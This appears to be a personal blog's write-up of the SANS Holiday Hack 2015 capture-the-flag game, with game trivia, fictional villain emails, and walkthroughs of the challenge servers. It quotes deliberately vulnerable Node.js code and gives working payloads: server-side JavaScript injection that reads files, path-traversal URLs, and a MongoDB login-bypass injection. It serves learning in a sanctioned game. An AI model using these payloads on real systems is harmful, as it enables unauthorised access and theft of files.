Sunday, January 10, 2016

SANS ICS Cyber Security Challenge Write-Up-Part 3









SANS ICS Cyber Security Challenge Write-Up-Part 2










SANS ICS Cyber Security Challenge Write-Up-Part 1

I just saw the scores for the SANS ICS Cyber Security Challenge.  I place 14th out of 483 participants.  This was the first time that I'd used volatility.  I don't have any formal education in digital forensics.  The only experience that I have in forensics is with each of the cyber challenges that I have done.  Some may not have done as well as they could have because they had work or family responsibilities, so I'm taking this placing with a grain of salt.  I didn't finish the whole challenge because I wanted to work on the SANS Holiday Hack Challenge.  It does make me wonder how well I could do if I picked an area in cyber security and applied myself towards learning it.

I'm posting what I did get done, even if it's not correct.








Tuesday, January 5, 2016

SANS Holiday Hack 2015-Part 5

Gnome Configuration Files

Dosis Gnome:
Gnome Serial Number: 20-RNG9731 
Camera monitoring?: YES
Audio monitoring?: YES
Camera update rate: 60min

Gnome mode: Gnome

Gnome 1:
Gnome Serial Number: NCC1701
Current config file: ./tmp/e31faee/cfg/sg.01.v1339.cfg 

Allow new subordinates?: YES
Camera monitoring?: YES
Audio monitoring?: YES
Camera update rate: 60min
Gnome mode: SuperGnome
Gnome name: SG-01
Allow file uploads?: YES
Allowed file formats: .png
Allowed file size: 512kb
Files directory: /gnome/www/files/


Gnome 2:
Gnome Serial Number: XKCD988
Current config file: ./tmp/e31faee/cfg/sg.01.v1339.cfg 
Allow new subordinates?: YES
Camera monitoring?: YES
Audio monitoring?: YES

Camera update rate: 60min 
Gnome mode: SuperGnome 
Gnome name: SG-02
Allow file uploads?: YES
Allowed file formats: .png Allowed file size: 512kb
Files directory: /gnome/www/files/


Gnome 3:
Gnome Serial Number: THX1138
Current config file: ./tmp/e31faee/cfg/sg.01.v1339.cfg 

Allow new subordinates?: YES
Camera monitoring?: YES
Audio monitoring?: YES
Camera update rate: 60min 

Gnome mode: SuperGnome 
Gnome name: SG-03
Allow file uploads?: YES
Allowed file formats: .png 

Allowed file size: 512kb
Files directory: /gnome/www/files/


Gnome 4
Gnome Serial Number: BU22_1729_2716057 Current config file: ./tmp/e31faee/cfg/sg.01.v1339.cfg Allow new subordinates?: YES
Camera monitoring?: YES
Audio monitoring?: YES
Camera update rate: 60min
Gnome mode: SuperGnome
Gnome name: SG-04
Allow file uploads?: YES
Allowed file formats: .png
Allowed file size: 512kb
Files directory: /gnome/www/files/ 

Extras

I like the extra touch if you look at the last page of the camera feed. “Leave the camera feed analysis to the burglars. 12 feeds should be enough to see that the cameras are working. Trust us. There is nothing but 1.99 million more living rooms after this page. We’ve checked." This ensures that millions of images aren't needed. In fact, I spotted that some images were already reused.

The letters of the word Atnas can spell Santa, as well as Satan.

If the hex sent from the gnome to the C&C, in the “IE: Unknown:” sections, is decoded to ASCII, there are the words “something clever”.

The SSID of the Dosis' WAP is December.

I found a non-alchoholic drink recipe in the banner in the etc directory of firmware.


In the www/routes/index.js file, there is a secret variable set to the value, “gnoderules”.


The first secret room was behind the bookshelf on the left in Ed’s room. The second secret room was above the 1st secret room. There was an odd panel in the wall. One of Jo-Mama’s cookies was in the room.

Ed’s room has a painting with peep holes so that people can spy on whoever is in the room.

There is an Easter Egg above the pond, on the left hand side, near Turing Avenue and Boole Way. 

The sign on Sasabune says, “Welcome to Sasabune”.

The sign in the coffee shop says, “Welcome to 'Cuppa Josephine's Coffee”.


The hotel name is the “Grand Hotel”.


I saw 4 Gnome In Your Homes, in game, other than the one that Josh and Jess Dosis were analyzing. The first one was in CounterHack iHQ entrance. The second one was in Ed Skoudis' room in the bookcase, one was in Dan's room, and one was in the NOC in the Intern's backpack.

There is a snow man outside of Counter Hack iHQ.

The street signs can be read. They are Turing Ave, Boole Way, Einstein Boulevard, Lovelace Way, Tesla St, Ritchie St, and Babbage St.

The Dosis name was made by taking the “k” and “u” off of Skoudis, and moving the “d” in Skoudis to the first position and the “s” to the original position of the “d”. Joshua and Jessica are the names of Ed Skoudis' children. (Duke Dosis is an anagram for Ed Skoudis.  I knew that the names were similar, but I didn't realize that it was an anagram until Mr. Skoudis told me via e-mail.)

The signs outside of the NOC, on the gates and the one near the pin pad says, “Authorized Personnel Only”.

Songs
The song playing when wandering around the neighborhood is “Walking In A Winter Wonderland”. The song playing in Cuppa Josephine's Coffee is “Have Yourself A Merry Little Christmas”.
The song playing in Dan's apartment building entrance is “Dominick the Donkey”.
The song playing in Dan's room is a mashup of “God Rest Ye Merry Gentlemen/Carol of the Bells”. The song playing in Counter Hack HQ is “You're a Mean One, Mr. Grinch”.

The song playing in Secret Room #1 (Tom Hessman's room)and Secret Room #2 is “Grandma Got Run Over By a Reindeer”.
The song playing in Josh Dosis' and Jess Dosis' rooms is “Deck the Halls”.
The song playing in the Dosis' kitchen is “Driedel, Driedel, Driedel”.

The song playing in the Grand Hotel entrance is “Wonderful Christmas Time”. The song playing in Sasabune is “Jingle Bells”.
The song in the maze is “Feliz Navidad”.
The song in Tom V's room is “All I Want For Chrismas is You”.


I can't read the sign or any of the button labels in Tom V's room. I guess that the creators don't want anyone making trouble.

The server room is kind of noisy, with the servers running, and all. The only sound in NetWars is computers clacking. (I didn't catch it, but it turns out that there are sounds from a movie in here.)

The NetWars Player says, “I’m not sure what happened. The guy next to me was fine one minute, the next, he stood up and yelled, “Have you SEEN Level 4 yet?” and left. I hope he comes back.”

Ready Player One is a science fiction novel by Ernest Cline.

The Easter Egg in Holiday Hack Quest may be paying tribute to the Easter Egg in Ready Player One. 


There are 87 uses of the word gnome (both singular and plural) in the story.

I believe that everyone in the firmware/gnome websites can be mapped to characters in Whoville.


Auggie: Augustus May Who 
DW: DrewWho
CW; CLW: Cindy Lou Who 

JoJo: JoJo
Louise: Betty Lou Who
Nedford: Ned McDodd
Stuart: Stu Lou Who
Maratha: Maratha May Whovier
Dr. O' Malley: Sally O' Malley
PS: Could be for “Pseudonym Seuss”, who is the creator of the “Whoville” stories. His real name is Theodor Seuss Geisel. He wrote under the psudonym “Dr. Seuss”. 

SANS Holiday Hack 2015-Part 4

Super Gnome 4

The hint to solve Super Gnome 4 was given by Tim Medin.
Tim: “LOL, fired from a volunteer position, Classic Dan. So yeah, SSJS injection attacks are pretty exciting. Like classic injection attacks, which allow you to run a local command on the target platform, SSJS injection attacks allow you to run arbitrary commands. Unlike XSS which allows you to run JavaScript on the victim’s browser, SSJS injection allows you to run arbitrary JavaScript on the server.
When a developer uses the JavaScript eval() method without validating the input, it is vulnerable to
SSJS injection. Anytime you see a parameter that can be manipulated on a site using Node.js, replace it with JavaScript that would produce a calculated value. Check out Bryan Sullivan’s paper Server-Side JavaScript Injection and SSJS Web Shell Injection by @signalcha0s.”
The vulnerable code in the index.js script in the www/routes directory was:
router.post('/files', upload.single('file'), function(req, res, next) {
if (sessions[sessionid].logged_in === true && sessions[sessionid].user_level > 99) { // NEDFORD:

this should be 99 not 100 so admins can upload var msgs = [];
file = req.file.buffer;
if (req.file.mimetype === 'image/png') {

msgs.push('Upload successful.');
var postproc_syntax = req.body.postproc;
console.log("File upload syntax:" + postproc_syntax);
if (postproc_syntax != 'none' && postproc_syntax !== undefined) {

msgs.push('Executing post process...'); var result;
d.run(function() {

result = eval('(' + postproc_syntax + ')');
});
// STUART: (WIP) working to improve image uploads to do some post processing. msgs.push('Post process result: ' + result);

}
msgs.push('File pending super-admin approval.'); res.msgs = msgs;

} else {
msgs.push('File not one of the approved formats: .png'); res.msgs = msgs;

}
} else

res.render('index', { title: 'GIYH::ADMIN PORT V.01', session: sessions[sessionid], res: res }); next();
});
All I had to do was to upload an image with file processing. It didn't matter which type. Then I just replaced what was in the postproc variable with the SSJS injection that I wanted to use. I was given this injection in the papers that were mentioned in the game.
I had trouble realizing that I wasn't requesting the correct directory. I checked the directory structure using:
res.end(require('fs').readdirSync('.').toString()) and res.end(require('fs').readdirSync('..').toString()) Once I corrected the directory, it worked as expected.
Here is the SSJS injection that I used to get the gnome.conf file.
res.end(require('fs').readFileSync('files/gnome.conf').toString())
Tim Medin gave an excellent paper on the SANS Pen Testing blog about how to make an asynchronous request. For the smaller files, a synchronous request is just fine, but for the larger files, the asynchronous request works better because it doesn't have the chance of causing the server to hang up. Unfortunately, I could not get his asynchronous method to work.
The second part was a bit more difficult. I couldn't send the zip files in the same way as before because they were too big. I tried the method that Tim Medin had mentioned in the Pen Testing Blog, however, the “Postproc Result” was undefined, and I kept getting a message that stated that the file had to be approved by “Nedford”. I would not have been able to solve this on my own with my current amount of knowledge. I e-mailed Counter Hack asking if I'm on the right track several times. I told them what I was doing, and they helped with methods and syntax that I didn't know. I was given this to try.
Buffer(fs.readFileSync('./files/factory_cam_4.zip').toString('base64'))


Gnome 4 E-Mail

To: <psychdoctor@whovillepsychiatrists.com>
Subject: Answer To Your Question
Date: Thu, 3 Dec 2015 13:38:15 -0500
Message-ID: <005a01d12df9$c5b00990$51101cb0$@atnascorp.com> MIME-Version: 1.0

Content-Type: multipart/alternative; .boundary="----=_NextPart_000_005B_01D12DCF.DCDA76C0" X-Mailer: Microsoft Outlook 15.0
Thread-Index: AdEt+b3jejRUkW/FSByK/qhouKyIpQ== Content-Language: en-us

This is a multipart message in MIME format.
------=_NextPart_000_005B_01D12DCF.DCDA76C0 Content-Type: text/plain;
.charset="us-ascii"
Content-Transfer-Encoding: 7bit

Dr. O' Malley,
In your recent email, you inquired:
> When did you first notice your anxiety about the holiday season? Anxiety is hardly the word for it. It's a deep-seated hatred, Doctor.

Before I get into details, please allow me to remind you that we operate under the strictest doctor-patient confidentiality agreement in the
business. I have some very powerful lawyers whom I'd hate to invoke in the event of some leak on your part. I seek your help because you are the best
psychiatrist in all of Who-ville.
To answer your question directly, as a young child (I must have been no more than two), I experienced a life-changing interaction. Very late on
Christmas Eve, I was awakened to find a grotesque green Who dressed in a tattered Santa Claus outfit, standing in my barren living room, attempting

to shove our holiday tree up the chimney. My senses heightened, I put on my best little-girl innocent voice and asked him what he was doing. He explained that he was "Santy Claus" and needed to send the tree for repair.
I instantly knew it was a lie, but I humored the old thief so I could escape

to the safety of my bed. That horrifying interaction ruined Christmas for me that year, and I was terrified of the whole holiday season throughout my teen years.
I later learned that the green Who was known as "the Grinch" and had lost his mind in the middle of a crime spree to steal Christmas presents. At the very moment of his criminal triumph, he had a pitiful change of heart and started playing all nicey-nice. What an amateur! When I became an adult, my fear of Christmas boiled into true hatred of the whole holiday season. I knew that I had to stop Christmas from coming. But how?
I vowed to finish what the Grinch had started, but to do it at a far larger scale. Using the latest technology and a distributed channel of burglars, we'd rob 2 million houses, grabbing their most precious gifts, and selling them on the open market. We'll destroy Christmas as two million homes full of people all cry "BOO-HOO", and we'll turn a handy profit on the whole deal.
Is this "wrong"? I simply don't care. I bear the bitter scars of the Grinch's malfeasance, and singing a little "Fahoo Fores" isn't gonna fix that!
What is your advice, doctor? Signed,
Cindy Lou Who



Super Gnome 5

I didn't solve this one. I do not know much about exploit writing, (or writing programs in general). I can read programs. It's strange that I can't write them. I read the articles that were given to me, but I didn't understand them. About the most that I'd understood was the Oxdusty paper about Address Space Layout Randomization. He wrote 112 characters in his example because he needed 100 to fill up the buffer, 4 bytes to overwrite the return address, 4 bytes to overwrite the eip, and 4 bytes to overwrite the esp. He put the address of the jmp instruction in the eip, and the shell code in the esp.
I found out how to get the program running on my local system to test it. I used Google to help me figure that out. It's “gcc -c snet.c”, “gcc -c sgstatd.c”, then “gcc snet.o sgstatd.o sgstatd”. I had to make a directory called, “/var/www/sgstatd”. I disassembled the program.
Josh Wright had told me in an e-mail that case 88 looked interesting. I tried typing hex numbers into the prompt to see if anything different happened. I figured out that it took one byte, so I was thinking about how I could make a one-byte character that would make hex 58. I was just thinking about numbers. I completely missed ascii. Then someone was kind and told me to type a letter “X”. I don't know why I didn't think of that because I've done hex to ascii conversions before. I guess that it was just lack of sleep. I found out that there was a hidden command prompt by typing the letter “X” into the selection screen instead of 1, 2, or 3.
I think that this is the vulnerable code. Odd that it's in the canary. *I meant the same method.  Now it makes perfect sense.  The canary job is to protect the return address.* Looks like there are 200 characters allowed to be stuffed in a 100 character buffer.
int sgstatd(sd) {
__asm__("movl $0xe4ffffe4, -4(%ebp)"); //Canary pushed
char bin[100];
//recv(sd, &bin, 200, 0);
sgnet_readn(sd, &bin, 200);

// Canary checked
write(sd, "\nThis function is protected!\n", 30); fflush(stdin);
__asm__("movl -4(%ebp), %edx\n\t" "xor $0xe4ffffe4, %edx\n\t" "jne sgnet_exit");
return 0; }


The Boss

I didn't capture enough gnomes to make a clear image, but I think that I know how to solve this particular part. You bitwise xor the pixels of the static images together to uncover a hidden image. I recently read an article about steganography detailing this technique. For example, “Image A XOR Image B = Image C; Image C XOR Image A = Image B; Image C XOR Image B = Image A”
I used ImageMagick to xor the images that I had together. Someone on stack overflow was kind enough to post this method.

convert factory_cam_1.png factory_cam_2.png -fx "(((255*u)&(255*(1-v)))|((255*(1- v))&(255*v)))/255" factorycam1and2.png
convert factorycam1and2.png factory_cam_3.png -fx "(((255*u)&(255*(1-v)))|((255*(1- v))&(255*v)))/255" factorycam12and3.png
convert factorycam12and3.png camera_feed_overlap_error.png -fx "(((255*u)&(255*(1-v)))|((255*(1- v))&(255*v)))/255" overlap12and3.png

convert overlap12and3.png factory_cam_4.png -fx "(((255*u)&(255*(1-v)))|((255*(1- v))&(255*v)))/255" overlap12and3.png 

SANS Holiday Hack 2015-Part 3

Super Gnome 2
JoshW and Tim gave the hints about how to solve this part of the challenge. I found the vulnerable scripts in the gnome/www/routes/index.js file. The particular vulnerability in this gnome was in the camera viewer. It allowed for a local file inclusion. There were two problems: One) The attacker had to bypass the extension check. Two) The attacker had to target a directory that they had permission to access.

Cam Viewer Code:
router.get('/cam', function(req, res, next) {
var camera = unescape(req.query.camera);
// check for .png
//if (camera.indexOf('.png') == -1) // STUART: Removing this...I think this is a better solution... right?
camera = camera + '.png'; // add .png if its not found
console.log("Cam:" + camera);
fs.access('./public/images/' + camera, fs.F_OK | fs.R_OK, function(e) {

if (e) {
res.end('File ./public/images/' + camera + ' does not exist or access denied!');

} });
fs.readFile('./public/images/' + camera, function (e, data) { res.end(data);
}); });

Tim gave the hint that LFI's are useful with file upload features. I looked at the settings upload code. The settings upload code allows me to make a directory. It is also supposed to accept a file, but this code is broken. The directory is made, however, the file is not really uploaded. In this case, the attacker has to get out of the /gnome/www/public/upload/<new random directory> directories.

Settings Upload Code:
router.post('/settings', function(req, res, next) {
if (sessions[sessionid].logged_in === true && sessions[sessionid].user_level > 99) { // AUGGIE:

settings upload allowed for admins (admins are 100, currently)
var filen = req.body.filen;
var dirname = '/gnome/www/public/upload/' + newdir() + '/' + filen; var msgs = [];
var free = 0;
disk.check('/', function(e, info) {

free = info.free; });
try {
fs.mknewdir(dirname.substr(0,dirname.lastIndexOf('/')));
msgs.push('Dir ' + dirname.substr(0,dirname.lastIndexOf('/')) + '/ created successfully!');
} catch(e) {
if (e.code != 'EEXIST')

throw e; }
if (free < 99999999999) { // AUGGIE: I think this is breaking uploads? Stuart why did you set this so high?
msgs.push('Insufficient space! File creation error!'); }
res.msgs = msgs;
next(); } else
res.render('index', { title: 'GIYH::ADMIN PORT V.01', session: sessions[sessionid], res: res }); });
In order to exploit the LFI, the attacker had to make a directory named .png. It can be done because hidden directories/files in Linux are started with a “.”. The file upload adds a random directory. All the attacker had to do was to make note of the directory structure and use “../”'s to move out of the unnecessary directories. The attacker could use trial and error until they got the file that they wanted. The directory that worked for me was:

http://52.34.3.80/cam?camera=../../../../../../../gnome/www/public/upload/LUbQRcPB/abcde/bob.png/../../../../../../../gnome/www/files/gnome.conf

This on also worked for me. (I lost the config file and had to re-exploit it.)

http://52.34.3.80/cam? camera=../../../../../../../gnome/www/public/upload/sCzEsNoM//.png/../../../../../../../gnome/www/files/gnome.conf

E-Mail 2
Maratha,
As a follow-up to our phone conversation, we'd like to proceed with an order of parts for our upcoming product line. We'll need two million of each of the following components:
+ Ambarella S2Lm IP Camera Processor System-on-Chip (with an ARM Cortex A9 CPU and Linux SDK)
+ ON Semiconductor AR0330: 3 MP 1/3" CMOS Digital Image Sensor + Atheros AR6233X Wi-Fi adapter
+ Texas Instruments TPS65053 switching power supply


+ Samsung K4B2G16460 2GB SSDR3 SDRAM + Samsung K9F1G08U0D 1GB NAND Flash
Given the volume of this purchase, we fully expect the 35% discount you mentioned during our phone discussion. If you cannot agree to this pricing, we'll place our order elsewhere.
We need delivery of components to begin no later than April 1, 2015, with 250,000 units coming each week, with all of them arriving no later than June 1, 2015.

Finally, as you know, this project requires the utmost secrecy. Tell NO ONE about our order, especially any nosy law enforcement authorities.
Regards, -CW

Super Gnome 3

The vulnerable code for Super Gnome 3 is in the login code.

router.post('/', function(req, res, next) { var db = req.db;
var msgs = [];

{db.get('users').findOne({username: req.body.username, password: req.body.password}, function (err,
user)});
 // STUART: Removed this in favor of below. Really guys? //db.get('users').findOne({username: (req.body.username || "").toString(10), password:
(req.body.password || "").toString(10)}, function (err, user) { // LOUISE: allow passwords longer than 10 chars
if (err || !user) {
console.log('Invalid username and password: ' + req.body.username + '/' + req.body.password); msgs.push('Invalid username or password!');
res.msgs = msgs;
res.render('index', { title: 'GIYH::ADMIN PORT V.01', session: sessions[req.cookies.sessionid],

res: res }); } else {
sessionid = gen_session();
sessions[sessionid] = { username: user.username, logged_in: true, user_level: user.user_level }; console.log("User level:" + user.user_level);
res.cookie('sessionid', sessionid);
res.writeHead(301,{ Location: '/' });
res.end();

} });

The hint given to exploit this vulnerability was given by Dan. The answer to this challenge was found in Petko D. Petkov’s article on MongoDB injection. The difference between his example and this problem was that he used the “find” parameter in the database query, and not the “findOne” parameter. The difference between “find” and “findOne” is that “find” returns more than one record. “findOne” only returns one record. The problem with this query is that it allows not only strings to be sent to the database, but objects as well. I can change the nature of the query so that either the username or the password evaluates to true, meaning that I don't need a password. However, just because I'm logged in does not mean that I have admin privileges. I could also specify a particular username. So, If I for instance, specify “admin” and have the password return “true”, then I can log in as an admin without a password. The problem is finding the administrator user name. It is not always, “Administrator” or “Admin”. In this case, the username was “admin”. I typed the Content-Type:application/json in the POST query headers. I typed the following query into the body of the POST query. I actually kept getting error messages using Burp suite. I had the right idea, but I had to try the exploit more than once.
{"username": "admin","password": {"$gt": ""}}

E-Mail 3

From: "c" <c@atnascorp.com>
To: <burglerlackeys@atnascorp.com>
Subject: All Systems Go for Dec 24, 2015
Date: Tue, 1 Dec 2015 11:33:56 -0500
Message-ID: <005501d12c56$12bf6dc0$383e4940$@atnascorp.com> MIME-Version: 1.0
Content-Type: multipart/alternative; .boundary="----=_NextPart_000_0056_01D12C2C.29E9B3E0" X-Mailer: Microsoft Outlook 15.0
Thread-Index: AdEsVeghqBzCbZs7SUyM8aoCkrx6Ow== Content-Language: en-us

This is a multipart message in MIME format.
------=_NextPart_000_0056_01D12C2C.29E9B3E0 Content-Type: text/plain;
.charset="us-ascii"
Content-Transfer-Encoding: 7bit

My Burgling Friends,
Our long-running plan is nearly complete, and I'm writing to share the date
when your thieving will commence! On the morning of December 24, 2015, each individual burglar on this email list will receive a detailed itinerary of
specific houses and an inventory of items to steal from each house, along


with still photos of where to locate each item. The message will also include a specific path optimized for you to hit your assigned houses quickly and efficiently the night of December 24, 2015 after dark.
Further, we've selected the items to steal based on a detailed analysis of
what commands the highest prices on the hot-items open market. I caution you - steal only the items included on the list. DO NOT waste time grabbing anything else from a house. There's no sense whatsoever grabbing crumbs too small for a mouse!

As to the details of the plan, remember to wear the Santa suit we provided you, and bring the extra large bag for all your stolen goods.
If any children observe you in their houses that night, remember to tell them that you are actually "Santy Claus", and that you need to send the specific items you are taking to your workshop for repair. Describe it in a very friendly manner, get the child a drink of water, pat him or her on the head, and send the little moppet back to bed. Then, finish the deed, and get out of there. It's all quite simple - go to each house, grab the loot,
and return it to the designated drop-off area so we can resell it. And, above all, avoid Mount Crumpit!
As we agreed, we'll split the proceeds from our sale 50-50 with each burglar.
Oh, and I've heard that many of you are asking where the name ATNAS comes from. Why, it's reverse SANTA, of course. Instead of bringing presents on Christmas, we'll be stealing them!
Thank you for your partnership in this endeavor. Signed:
-CLW
President and CEO of ATNAS Corporation 

SANS Holiday Hack 2015-Part 2

Super Gnome 1

I then used the Shodan search to visit the website of one of the the super gnomes: 52.2.229.189. It showed a logon portal. I used the word “admin” as the username, and the “SittingOnAShelf” password that I found in the /opt/mongodb directory in the gnome.0 file. I was logged in as an admin. There was a menu with Home, Camera, Files, Gnomenet, Settings, and Logout as the selections. I downloaded the files to peruse later. I looked at the Camera section which was an eerie collection of people’s living rooms and bedrooms. I looked at Gnomenet, which seemed to detail problems with the camera feed. For instance, "Took a look at your issue. It looks like the camera feed collector only cares about the name and will merge the feeds. Looks like each pixel is XORed... Its going to be a lot of work to fix this. We are too late in the game to push a new update to all the cameras... stop naming cameras the same name. ~DW" I filed this information away for later.
Then I looked at the settings which would help me find information later. The gnome home page let me know which gnome I had access to. This gnome was Super Gnome 1. When I downloaded his files, I got a pcap. From this point forward, note that I do the same procedure every time I get a pcap. I looked at "Protocol Hierarchy", and then selected “Data” and right-clicked and selected apply a filter. It filtered out TCP traffic. I right-clicked on one of the TCP packets and selected “Follow the TCP stream. There was an e-mail and a base64 encoded image. I used an online tool to decode the base64 encoded image for me: http://www.opinionatedgeek.com/dotnet/tools/base64decode/ I scanned the file that I was given to be sure that it wasn’t infected. Then I used file -i <filename> in the Terminal to see what kind of file it was. As expected, from the content of the e-mail, it was a jpeg file. It was a hand drawn GIYH Architecture.

E-Mail 1

JoJo,
As you know, I hired you because you are the best architect in town for a distributed surveillance system to satisfy our rather unique business requirements. We have less than a year from today to get our final plans in place. Our schedule is aggressive, but realistic.
I've sketched out the overall Gnome in Your Home architecture in the diagram attached below. Please add in protocol details and other technical specifications to complete the architectural plans.
Remember: to achieve our goal, we must have the infrastructure scale to upwards of 2 million Gnomes. Once we solidify the architecture, you'll work with the hardware team to create device specs and we'll start procuring hardware in the February 2015 timeframe.
I've also made significant progress on distribution deals with retailers. Thoughts?

Looking forward to working with you on this project! -C

E-Mail1: PhotoAttachment:GIYHArchitecture